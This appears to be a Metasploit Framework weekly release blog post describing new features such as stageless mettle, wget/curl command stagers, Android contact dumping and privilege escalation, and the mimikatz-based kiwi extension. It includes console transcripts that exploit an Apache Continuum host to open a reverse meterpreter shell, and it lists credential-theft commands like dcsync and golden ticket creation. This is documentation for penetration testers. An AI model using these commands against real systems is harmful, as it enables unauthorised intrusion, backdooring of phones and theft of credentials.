Welcome back to the Metasploit Weekly Wrapup! It's been a while since the last one, so quite a bit has happened in that time including 75 Pull Requests.

Stageless mettle

The rewrite of meterpreter for POSIX systems, mettle, now supports a stageless mode. You can now build standalone static executables for almost a dozen architectures and run them on everything from small home routers to cell phones to servers and mainframes. It can also take its configuration from the command line, so you don't even need a different executable for different handler locations.

UDP pivoting

The new mettle supports pivoting just like Windows meterpreter, and both have had some improvements for forwarding UDP packets in this update. This is particularly useful with auxiliary/scanner/discovery/udp_sweep, which tries a bunch of different protocol probes on a range of ports to quickly identify UDP services.

Android

Using APK injection to trojan an existing Android app is a cool trick for social engineering folks into installing your backdoor, and it can get you a lot of info from a phone. One downside is that Android's privilege seperation system prevents you from reading the data owned by other apps, so there are some things you might want to steal that you won't have access to. That's where Local Privilege Escalation exploits become essential. This week's update includes a new LPE for a relatively old vulnerability, the put_user bug which was exploited in the wild in 2013, as well as updates to the towelroot exploit allowing it to target more devices.

This week's update adds CSV and vCard output formats to Android Meterpreter's dump_contacts command. This means you can now dump an Android device's contact list in an importable format.

Ever find yourself in a situation where you can't back up your phone contacts normally? Meterpreter to the rescue! If you can shell your phone - which you should be able to if it's yours - the dump_contacts command now gives you the option of a normal text file, CSV, or vCard for the output format.

Here's how to use it:

meterpreter > dump_contacts -h  
Usage: dump_contacts [options]  
Get contacts list.  
  
OPTIONS:  
  
    -f   Output format for contacts list (text, csv, vcard)  
    -h        Help Banner  
    -o   Output path for contacts list  
  
  
meterpreter > dump_contacts -f csv  
[*] Fetching 4 contacts into list  
[*] Contacts list saved to: contacts_dump_20170121174248.csv  
meterpreter > dump_contacts -f vcard  
[*] Fetching 4 contacts into list  
[*] Contacts list saved to: contacts_dump_20170121174258.vcf  

wget/curl command stagers

If you're familiar with command injections, you know that downloading a payload from a remote host and then executing it can be more efficient than writing the payload to the target incrementally.

This update brings wget(1) and curl(1) command stagers (CmdStager) to Metasploit in environments that need it most (read: embedded). With the option of HTTP or HTTPS, a small embedded device can now fetch payloads over either protocol.

To use the new command stagers in your module, you can set flavor: wget or flavor: curl in your execute_cmdstager call, or you can set the flavor in CmdStagerFlavor in your info hash. Lastly, if you're already running the module, you can change the flavor with CMDSTAGER::FLAVOR, but that'll work only if the module doesn't define a required flavor.

Here's an example of setting CMDSTAGER::FLAVOR:

msf > use exploit/linux/http/apache_continuum_cmd_exec   
msf exploit(apache_continuum_cmd_exec) > set rhost 192.168.33.129  
rhost => 192.168.33.129  
msf exploit(apache_continuum_cmd_exec) > set payload  
linux/x64/mettle_reverse_tcp   
payload => linux/x64/mettle_reverse_tcp  
msf exploit(apache_continuum_cmd_exec) > set cmdstager::flavor wget   
cmdstager::flavor => wget  
msf exploit(apache_continuum_cmd_exec) > set lhost 192.168.33.1   
lhost => 192.168.33.1  
msf exploit(apache_continuum_cmd_exec) > run  
  
[*] Started reverse TCP handler on 192.168.33.1:4444   
[*] Injecting CmdStager payload...  
[*] Using URL: http://0.0.0.0:8080/XlM6PUw74P  
[*] Local IP: http://192.168.1.3:8080/XlM6PUw74P  
[*] Meterpreter session 1 opened (192.168.33.1:4444 ->  
192.168.33.129:55171) at 2017-01-27 13:27:54 -0600  
[*] Command Stager progress - 100.00% done (114/114 bytes)  
[*] Server stopped.  
meterpreter >   

Notice how small the command stager is. If we were to write the payload out with echo(1) or printf(1) or somesuch, we'd be sending the payload as hex strings... which will take a while to write to disk.

History command

Metasploit stores your msfconsole history in ~/.msf4/history but sometimes you only want dump out pieces of it. The new history command works similarly to the bash command of the same name letting you do just that.

workspace -v

The workspace command now takes a verbose flag to dump out some statistics about the stuff you've collected in each workspace. It shows the number of hosts, vulns, creds, loots, and notes.

11:52:25 192.168.99.1 nasa j:0 s:0 exploit(psexec) > workspace  
   default  
   fbi  
  * nasa  
   wh.gov  
11:52:45 192.168.99.1 nasa j:0 s:0 exploit(psexec) > workspace  -v  
  Workspaces  
  ==========  
  current  name     hosts  services  vulns  creds  loots  notes  
  -------  ----     -----  --------  -----  -----  -----  -----  
           default  5      2         3      3      0      8  
           fbi      98     165       49     155    301    72  
  *        nasa     32     81        41     14     33     20  
           wh.gov   1      9         0      0      0      0  
  
11:52:45 192.168.99.1 nasa j:0 s:0 exploit(psexec) >  

to_handler command

Complementing the handler command is another new command, to_handler, that does the same thing, but takes its settings from the context of the currently-selected payload module. At some point it is likely that these two things will be unified, but for now it's pretty useful as is.

12:07:10 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > options  
  Module options (payload/windows/meterpreter/reverse_https):  
     Name      Current Setting  Required  Description  
    ----      ---------------  --------  -----------  
    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)  
    LHOST                      yes       The local listener hostname  
    LPORT     8443             yes       The local listener port  
    LURI                       no        The HTTP Path  
12:07:11 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > set LHOST 192.168.99.1  
LHOST => 192.168.99.1  
12:07:27 192.168.99.1 nasa j:0 s:0 payload(reverse_https) >   
12:07:29 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > set LPORT 8888  
LPORT => 8888  
12:07:39 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > to_handler  
[*] Payload Handler Started as Job 2  
[*] Started HTTPS reverse handler on https://0.0.0.0:8888  
[*] Starting the payload handler...  
12:07:41 192.168.99.1 nasa j:1 s:0 payload(reverse_https) > jobs -v  
  Jobs  
  ====  
   Id  Name                    Payload                            Payload opts               URIPATH  Start Time                 Handler opts  
   --  ----                    -------                            ------------               -------  ----------                 ------------  
   2   Exploit: multi/handler  windows/meterpreter/reverse_https  https://192.168.99.1:8888           2017-01-27 12:07:40 -0600  https://0.0.0.0:8888  

Revamped kiwi

Meterpreter now has a revamped kiwi extension, replacing the old system of specific TLVs with a much simpler interface to the mimikatz command system. What that means for developers is a lot fewer moving parts between the two codebases and easier, streamlined updates. What that means for users is getting the latest and greatest mimikatz in Meterpreter a lot sooner.

This brings kiwi up to mimikatz version 2.1, and now works on Windows XP SP3 and Windows 2003 SP1 all the way up to 10 and 2016. In particular the new dcsync command is fabulous for stealing hashes from a domain controller. This grabs info from the DC's user database so, just like when parsing NTDS.dit, it gets historical hashes as well as the one currently in use for the given user.

As before, the kiwi client extension has commands for most of the things you want to get out of mimikatz:

Kiwi Commands  
=============  
  
    Command                Description  
    -------                -----------  
  
    creds_all              Retrieve all credentials (parsed)  
    creds_kerberos         Retrieve Kerberos creds (parsed)  
    creds_msv              Retrieve LM/NTLM creds (parsed)  
    creds_ssp              Retrieve SSP creds  
    creds_tspkg            Retrieve TsPkg creds (parsed)  
    creds_wdigest          Retrieve WDigest creds (parsed)  
    dcsync                 Retrieve user account information via DCSync (unparsed)  
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync  
    golden_ticket_create   Create a golden kerberos ticket  
    kerberos_ticket_list   List all kerberos tickets (unparsed)  
    kerberos_ticket_purge  Purge any in-use kerberos tickets  
    kerberos_ticket_use    Use a kerberos ticket  
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)  
    lsa_dump_sam           Dump LSA SAM (unparsed)  
    lsa_dump_secrets       Dump LSA secrets (unparsed)  
    wifi_list              List wifi profiles/creds  

If that doesn't cover what you need, you can also send commands directly to the underlying mimikatz shell, so you can access everything that we don't have a direct wrapper for.

And then you run the most important command that mimikatz offers:

meterpreter > kiwi_cmd coffee  
  
    ( (  
     ) )  
  ._ _ _ .  
  |      |]  
  \      /  
   `----'  

New Modules

Exploit modules (6 new)

Auxiliary and post modules (4 new)

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub: